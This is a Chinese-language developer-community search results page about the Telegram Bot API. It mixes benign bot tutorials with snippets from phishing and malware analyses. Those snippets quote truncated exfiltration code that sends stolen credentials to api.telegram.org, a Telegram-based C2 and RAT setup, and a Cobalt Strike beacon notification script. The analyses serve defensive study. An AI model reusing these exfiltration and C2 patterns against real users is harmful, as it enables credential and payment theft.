与Telegram API python (telithon telegram )的联合小组 - 腾讯云开发者社区

文章/答案/技术大牛

发布

黑客利用 Telegram API 传播新的 Golang 后门

Netskope 的网络安全研究人员发现了一种新型的、具备一定功能但可能仍处于开发阶段的基于 Golang 语言编写的后门程序，该程序利用 Telegram 进行指令与控制（C2）活动。...研究人员使用 Detect It Easy 工具检测发现，该恶意软件在执行过程中呈现出典型的后门特征。在 C2 通信方面，该后门程序借助一个开源的 Go 语言包与 Telegram 进行交互。...“/screenshot” 指令虽未完全开发完成，但仍会向 Telegram 频道发送 “Screenshot captured” 的消息。...所有指令的执行结果都会通过 “sendEncrypted” 函数回传至 Telegram 频道。这种恶意利用云应用程序的行为给网络安全防御工作带来了巨大挑战。...一方面，攻击者无需搭建复杂的基础设施，降低了攻击成本；另一方面，从防御者角度出发，很难区分正常的 API 用户请求和恶意的 C2 通信。”

4891 0

打通OpenClaw与Telegram的超详细实操教程

今天，我们继续推进，为大家带来在openclaw中接入Telegram的完整教程，图文并茂，一步步带你打通。...一、获取Token与配对码创建Bot并获取Token在Telegram中搜索@BotFather，进入聊天界面。...完成配对在终端执行以下命令，将openclaw与你的Bot绑定：展开代码语言：BashAI代码解释openclawpairingapprovetelegram你的配对码看到成功提示即表示配对完成。...三、测试效果现在回到Telegram中，向你的Bot发送任意消息。如果一切顺利，你会收到来自openclaw的回复，说明Telegram接入已成功生效！...写在最后至此，你已经完成了openclaw与Telegram的对接。加上之前的飞书和Discord，现在你可以在这三个主流聊天平台上自由调用AI助手来帮你处理任务了。

5250 1

您找到你想要的搜索结果了吗？

是的

没有找到

不得不说的Telegram : 币圈与链圈的微信

你可以带着这个问题来阅读这篇软件体验报告，今天的主角是一款 IM 软件：Telegram Telegram Messenger 是一个跨平台的实时通讯软件，它的客户端是自由及开放源代码软件，但是它的服务器是专有软件...用户可以相互交换加密与自析构的消息，以及照片、影片、文件，支持所有的文件类型。...官方网站有正式发布 Android、iOS、Mac OS X 与正在 Beta 的 Windows Phone 的版本。...在我们隐私被暴露在互联网各个角落的今天， Telegram 对信息安全的重视显得弥足珍贵。...Telegram 支持 1h、8h、2d 的定时静音，非常适合看电影、开会、读书、周末等场景。 ? Telegram绝对是一把打开新世界大门的钥匙。

2.3K1 0

Telegram基础设施在钓鱼攻击中的滥用机制与防御对策研究

本文聚焦于2025年曝光的一类以Telegram为核心载体的高级钓鱼活动，系统剖析其如何利用Bot API、公开频道、WebView嵌入及消息自毁等原生功能，实现凭据窃取、会话劫持与恶意分发的闭环。...本文提出一套涵盖终端行为监控、身份认证加固、浏览器运行时保护与威胁情报提取的多维防御框架，并辅以可落地的代码示例，验证对异常Telegram进程通信、WebView劫持及Bot API调用的识别能力。...关键词：Telegram；钓鱼攻击；Bot API；AiTM；数据外泄；WebView劫持；零信任1 引言即时通讯平台因其高渗透率、端到端加密与开放API生态，已成为现代数字协作不可或缺的组成部分。...与传统依赖自建C2服务器或僵尸网络的模式不同，此类攻击完全依托Telegram的合法服务链——包括Bot API、公开频道、私有群组及内嵌WebView——构建隐蔽且高效的攻击管道。...2 攻击机制深度解析2.1 攻击链路重构根据SC Media与Cyber Security News联合披露的案例，本次攻击可分为五个关键阶段：诱饵分发：攻击者在公开Telegram频道（如@FreeNFT_Giveaway

3171 0

基于Telegram外传的WordPress域名续费钓鱼攻击分析与防御机制

此类攻击不仅利用了管理员对域名管理时效性的焦虑心理，还借助Telegram平台的端到端加密通信和低部署成本，显著提升了隐蔽性与成功率。...(2.4) 数据外传：Telegram作为隐蔽通道所有窃取的数据通过前端JavaScript实时发送至攻击者控制的Telegram Bot。...Bot（通过IFTTT或自建Webhook）fetch('https://api.telegram.org/bot/sendMessage', {method: 'POST',headers...：企业防火墙通常允许访问Telegram（尤其在开发或协作场景中），难以区分正常通信与恶意数据外传。...Bot Token或使用代理中转，规避API监控。

1001 0

Telegram机器人在欧洲凭证钓鱼中的协同机制与防御路径

2025年下半年，欧洲多国安全机构联合披露一类新型凭证钓鱼活动，其核心特征是以Telegram机器人作为攻击控制中枢，实现钓鱼模板分发、受害者数据实时回传与会话接管指令下发。...研究发现，攻击者通过将前端钓鱼页面与后端Telegram Bot解耦，显著提升了运营弹性与响应速度；同时利用Telegram频道的广播特性，实现“一对多”指令同步。...关键词：Telegram机器人；凭证钓鱼；Bot API；会话接管；多因素认证；行为检测1 引言随着云服务与数字身份的深度融合，凭证窃取已成为网络攻击的核心目标。...Bot后端通常为Python脚本，使用python-telegram-bot库：from telegram import Updatefrom telegram.ext import Application...6 结论Telegram机器人在欧洲凭证钓鱼中的应用，标志着攻击模式从“静态投递”向“动态交互”的演进。其通过Bot API实现数据实时回传与操作指令下发，显著缩短攻击窗口并提升成功率。

2481 0

telegram-1：向tg的机器人群推送消息

Telegram Bot的创建简单，API全面且免费，适合国际业务。业务需求：最近需要将自动客户端的自动打包结果的二维码和下载地址推送到tg机器人群，需要了解。...目录： (1).创建telegram机器人 (2).创建一个接受机器人消息的群组 (3).python向bot推送消息的demo 1.相关准备 2.测试demo (1).创建telegram机器人登录...浏览器访问下述url获取这个群组的chat_id： https://api.telegram.org/bot5049056695:AAFfyxCap2I0SZazC0DJ7WPw5oBz9oZcl7A/...getUpdates 在返回值中找到这个群组的chat_id，机器人会向这个chat_id发送消息： -750599670 (3).python向bot推送消息的demo 1.相关准备去官网查看下api...: https://core.telegram.org/bots/api 需要用到 python-telegram-bot 库。

12.1K3 0

命令控制之Telegram

的Bots功能结合Python来对API的调用来实现C2。...Cracking Telegram Encryption，而且Telegram支持发送所有文件类型，Telegram提供对外开放的api，用户可定制性的开发客户端。...之后成功创建Token： 12724xxxx059:AAEINExxxxxxxxxxxxxxxxxxx_hIl8A Bot API 示例安装依赖目前Telegram官网已经公开了如下语言的开发实例:...以上介绍了Bot API中发送、接收文本消息和上传、下载文件的功能，剩下只需要将功能拼接，添加命令解析，就可以实现一个简易的C2 Server POC bt2框架项目介绍 Bt2是一个使用python...编写开发的C2框架，它使用了telegram提供的基础设施和功能丰富的bot api，稍微改变了其通信平台的用途，使其可以充当c&c。

4.1K2 0

Afdian.Sdk | 开发笔记

: 一个爱发电开发者API的简易包装 PHP | ZeroDream-CN/afdian-php-sdk: 爱发电非官方简易 PHP SDK Python | gsycl2004/afdian-python-sdk...: 爱发电接口封装 Java | afdian-java-sdk: 爱发电api的 java sdk VPS 测速脚本 1. superbench.sh wget -qO- git.io/superbench.sh...| bash 2. superspeed.sh zq/superspeed: 包含全国各地测速节点的一键测速脚本 Superspeed.sh 使用全国各地三大运营商2的 speedtest 测速节点进行全面测速...TelegramBots/Telegram.Bot: .NET Client for Telegram Bot API 开发者 | 爱发电 Telegram.Bot.Examples/Telegram.Bot.Examples.WebHook...at master · TelegramBots/Telegram.Bot.Examples Telegram Bot API 本文作者： yiyun 本文链接： https://moeci.com/

1.6K3 0

面向意大利公共服务的新型钓鱼工具包分析与防御机制研究

2025年11月，安全厂商Group-IB与KnowBe4联合披露了一款专门针对意大利实体的新型钓鱼工具包（Phishing Kit），该工具包以意大利主流IT服务提供商Aruba为伪装对象，通过伪造其...更关键的是，Telegram Bot作为数据回传通道，具有高隐蔽性与实时性：// telegram.phpfunction send_to_telegram($user, $pass, $ip) {$bot_token...(scripts.some(s => s.includes('api.telegram.org'))) {console.warn('Telegram exfiltration detected');return...API调用if re.search(r'api\.telegram\.org/bot\d+:[A-Za-z0-9_-]+/sendMessage', packet.payload):if not whitelist.contains...企业亦应实施最小权限原则，限制Aruba账户的API访问范围。六、结语本文通过对一款针对意大利Aruba用户的钓鱼工具包进行逆向分析，揭示了其前端仿冒、地理过滤、Telegram外传等关键技术特征。

2121 0

玩转OpenClaw｜云上OpenClaw(Clawdbot)快速接入Telegram指南

前置准备工作OpenClaw（原Clawdbot）原生支持接入WhatsApp、Discord、Telegram、Slack等常用聊天软件，并通过这些软件与OpenClaw进行交互。...配置模型API Key提示：OpenClaw接入Telegram场景推荐使用海外版模型。为OpenClaw配置模型API Key可以直接在Lighthouse服务器的应用管理页面进行操作。...如果尚未进行模型配置，可以在此步通过命令行配置模型API Key。为OpenClaw配置模型API Key可以在Lighthouse服务器的应用管理页面进行操作。...Channel配置-接入Telegram接下来进入 Select channel 步骤，通过键盘方向键选中 Telegram (Bot API) ，并且回车确认。...完成以上步骤之后，您已经初步完成了OpenClaw接入Telegram Bot。在Telegram中与Bot聊天在上文中BotFather的聊天中，点击图示的位置，打开Bot对话框。

16K4 5

TelegramRAT：一款功能强大的基于Telegram的远程通信访问控制工具

关于TelegramRAT TelegramRAT是一款功能强大的基于Telegram的远程通信访问控制工具，该工具具备跨平台特性，可以通过Telegram来实现控制端与目标设备之间的远程通信...工具安装由于该工具基于纯Python开发，因此我们首先需要在本地设备上安装并配置好Python环境。...并搜索https://t.me/BotFather； 2、创建Bot并获取API_TOKEN； 3、现在搜索https://t.me/chatIDrobot并获取chat_id； 4、打开client.py...，定位到第16行和第17行，并在其中写入API_TOKEN和chat_id； 5、在Windows系统中运行python client.py或在Linux中运行python3 client.py； 6、...打开你刚刚创建的Bot，并直接在消息输入框中输入并发送命令即可；许可证协议本项目的开发与发布遵循Apache-2.0开源许可证协议。

9273 0

DeepPavlov: 强大的聊天机器人和对话系统开源AI库（附安装指南）

我们支持 Linux 与 Windows 平台，以及 Python 3.6 和 Python 3.7 不支持 Python 3.5！...-m deeppavlov [-d] 可以为 download，用于下载模型数据（与 -d 相同）， train，使用配置文件中指定的数据训练模型...， evaluate，在同一数据集上计算指标， interact，通过 CLI 进行交互， riseapi，运行 REST API 服务器（请参阅文档[1]）， telegram，作为 Telegram...，请参阅 Telegram 机器人文档页面以及“集成”部分中的其他内容，以获取更多信息。...这些文档深入探讨了这篇文章中提及的许多主题：文档[1] http://docs.deeppavlov.ai/en/master/integrations/rest_api.html 文档[2] http

4.4K1 0

简化通知基础设施：开源的消息通知服务 | 开源专题 No.41

novuhq/novu[1] Stars: 22.9k License: MIT Novu 是一个开源的通知基础设施项目，它提供了统一的 API 来通过多个渠道发送通知，包括应用内、推送、电子邮件...主要功能有：为所有消息提供商 (应用内、电子邮件、短信、推送和聊天) 提供单一 API 管理多个渠道上的通知非常容易配备 CMS 进行高级布局和设计管理内置保护机制以防止变量丢失 (即将推出) 安装和集成简单方便...python-telegram-bot/python-telegram-bot[2] Stars: 22.9k License: GPL-3.0 这个项目是一个提供纯 Python 异步接口的 Telegram...Bot API 库。...它与 Python 3.8+兼容，并包含一些高级类，使机器人开发变得简单和直观。该库支持 Telegram Bot API 6.8 的所有类型和方法。

1.6K2 0

钓鱼团伙用Telegram机器人“接单”：欧洲凭证窃取进入“实时客服”时代

开放API成双刃剑Telegram之所以成为钓鱼团伙的首选平台，源于其三大特性：Bot API完全开放且文档完善：开发者可轻松创建具备消息推送、按钮交互、文件传输能力的机器人；端到端加密非默认启用：普通群组和频道通信未加密...据SC World监测，2025年Q4，与钓鱼活动关联的Telegram机器人数量同比增长 320%，其中 68% 针对金融与云服务凭证，22% 聚焦社交账号（如Instagram、TikTok），其余涉及游戏...即便部署了终端检测与响应（EDR）系统，若未特别监控 api.telegram.org 的异常POST请求，也极易漏报。对此，工作组建议采取以下技术对策：1....网络层：封禁高风险Telegram基础设施在防火墙或代理中，基于威胁情报封禁已知与钓鱼相关的Telegram Bot Token、Channel ID对应的IP段；使用DNS过滤服务（如Cisco Umbrella...、Zscaler）阻止对 core.telegram.org 和 api.telegram.org 的非业务访问。

1671 0

1分钟链圈 | 区块链人才稀缺，深圳企业提高8%薪酬预算抢才!美投行：加密货币将暴跌90%，大众市场或被消灭

（每日区块链） 6.Telegram计划取消公开发售加密货币但其已募集了17亿美元资金据知情人士透露，Telegram已经将其新创建的加密货币出售给了少于200名私人投资者并筹集了17亿美元。...Telegram表示正在利用名为Telegram Open Network的项目筹集的资金来构建其技术，并进一步重新开发和维护主要的信使服务，Telegram的服务目前在全球拥有约2亿用户。...据BOK的2017年支付结算报告书，韩国央行有一个专门小组自1月份以来一直在研究发布CBDC的可能性以及加密货币将如何影响该国的金融。 BOK表示将在六月底之前公布有关这个问题的最新消息。...（巴比特） 10.澳大利亚联合国儿童基金会启动采矿捐赠平台澳大利亚联合国儿童基金会推出了一个平台，该网站将“允许用户通过在线时打开网页来为弱势儿童提供帮助和希望”。...（搜狐） 13.区块链人才稀缺，深圳企业提高8%薪酬预算抢才 2018春季深圳人才供求与流动报告显示，AI、区块链等新技术岗位人才稀缺，供不应求，其中区块链领域的需求在过去一年增长了近20倍，为了招到人才

6863 0

一封“域名续费”邮件，竟让WordPress站长银行卡被掏空——新型钓鱼攻击借Telegram实时收割支付信息

近日，独立安全研究员Anurag Gawande在SC Media上披露了一项针对WordPress管理员的新型钓鱼活动，其核心手法正是利用“域名续费”这一高频、刚需场景，结合高度仿真的支付界面与Telegram...Please try again.");});第四阶段：Telegram作为“零基础设施”数据管道与传统钓鱼攻击需自建C2服务器不同，本次攻击的创新点在于完全依赖Telegram Bot作为数据接收端。...攻击者在后端使用Python或Node.js脚本，将收集到的数据通过Telegram Bot API实时推送至私有频道：# 攻击者服务器后端（Python + python-telegram-bot）import...提供稳定API）；数据传输端到端加密（Telegram MTProto协议）；攻击者可通过手机App实时监控“战果”，甚至设置关键词提醒。...第五阶段：快速变现与身份冒用获取银行卡信息与OTP后，攻击者通常在数分钟内完成以下操作：在支持3D Secure绕过的商户（如部分虚拟主机、游戏充值平台）进行小额测试交易；成功后，立即在高价值商品（如电子产品

1931 0

钓鱼攻击之后，你的密码去了哪里？——一场横跨暗网、Telegram与企业内网的数据黑市追踪

而这一切的起点，可能只是员工点击了一封伪装成“DHL包裹通知”的链接。近日，一项由多家安全研究机构联合开展的新调查，首次系统性追踪了钓鱼攻击中被盗数据的完整生命周期。...取而代之的，是基于即时通讯工具的实时数据回传机制。其中，Telegram因其开放的Bot API、端到端加密（可选）、以及极低的运营门槛，成为当前最主流的“数据接收器”。...研究人员在2025年12月捕获的一个仿冒招商银行的钓鱼页面中，发现了如下代码片段：// 钓鱼表单提交后执行fetch('https://api.telegram.org/bot/sendMessage...和——它们指向攻击者预先创建的Telegram Bot。...六、防御之道：从“被动响应”到“主动免疫”面对如此复杂的钓鱼生态，个人与企业该如何应对？

1661 0

Cobalt Strike beacon上线通知cna脚本

我在github找到了slack的通知脚本slack-notify-beacon.cna，虽然也找到了一个telegram通知的，但是写的太麻烦，还要调用Python，于是自己改写了一个telegram-bot...message containing it # ------------------------------------------- $tg_bot_webhookURL = 'https://api.telegram.org...$message, $tg_bot_webhookURL); exec(@curl_command); } 需要客户端/服务端支持curl、能够访问tg的api地址（国内访问不到）原理很简单，...beacon_initial 后通过调用os的curl请求webhook，bot的申请教程可以百度，同理可以很简单的改写其他webhook，如：钉钉、Server酱等 telegram的bot申请地址：...https://telegram.me/botfather 推荐阅读： https://www.right.com.cn/forum/forum.php?

4.1K6 0

如何用 Python 对接实时股票 API 并构建预警系统？：实战分享

在量化交易和个人投资管理中，实时监控股票价格并设置自动预警是提升决策效率的关键。今天，我将手把手教你如何使用 Python 对接实时股票 API，并构建一个功能完整的股票价格预警系统。...系统架构设计我们的预警系统将包含以下核心模块：数据获取模块 - 通过 WebSocket 连接实时股票 API 数据处理模块 - 解析和处理实时行情数据预警规则引擎 - 根据预设条件触发预警通知模块 -.../Telegram API - 预警通知发送第一步：配置开发环境# requirements.txt# 实时股票API客户端和数据处理库websocket-client>=1.3.0requests>=...2.28.0pandas>=1.5.0numpy>=1.24.0python-dotenv>=0.21.0schedule>=1.1.0redis>=4.5.0# 可选的通知库python-telegram-bot...连接实时股票 API构建一个可扩展的预警规则引擎实现多种通知方式（邮件、Telegram 等）设计一个完整的股票监控系统架构下一步改进方向：性能优化：使用异步 IO 提高并发处理能力机器学习集成：添加基于机器学习的智能预警多市场支持

2281 0

点击加载更多

黑客利用 Telegram API 传播新的 Golang 后门

打通OpenClaw与Telegram的超详细实操教程

不得不说的Telegram : 币圈与链圈的微信

Telegram基础设施在钓鱼攻击中的滥用机制与防御对策研究

基于Telegram外传的WordPress域名续费钓鱼攻击分析与防御机制

Telegram机器人在欧洲凭证钓鱼中的协同机制与防御路径

telegram-1：向tg的机器人群推送消息

命令控制之Telegram

Afdian.Sdk | 开发笔记

面向意大利公共服务的新型钓鱼工具包分析与防御机制研究

玩转OpenClaw｜云上OpenClaw(Clawdbot)快速接入Telegram指南

TelegramRAT：一款功能强大的基于Telegram的远程通信访问控制工具

DeepPavlov: 强大的聊天机器人和对话系统开源AI库（附安装指南）

简化通知基础设施：开源的消息通知服务 | 开源专题 No.41

钓鱼团伙用Telegram机器人“接单”：欧洲凭证窃取进入“实时客服”时代

1分钟链圈 | 区块链人才稀缺，深圳企业提高8%薪酬预算抢才!美投行：加密货币将暴跌90%，大众市场或被消灭

一封“域名续费”邮件，竟让WordPress站长银行卡被掏空——新型钓鱼攻击借Telegram实时收割支付信息

钓鱼攻击之后，你的密码去了哪里？——一场横跨暗网、Telegram与企业内网的数据黑市追踪

Cobalt Strike beacon上线通知cna脚本

如何用 Python 对接实时股票 API 并构建预警系统？：实战分享

相关资讯

热门标签

活动推荐

运营活动

社区

活动

圈层

关于

腾讯云开发者

热门产品

热门推荐

更多推荐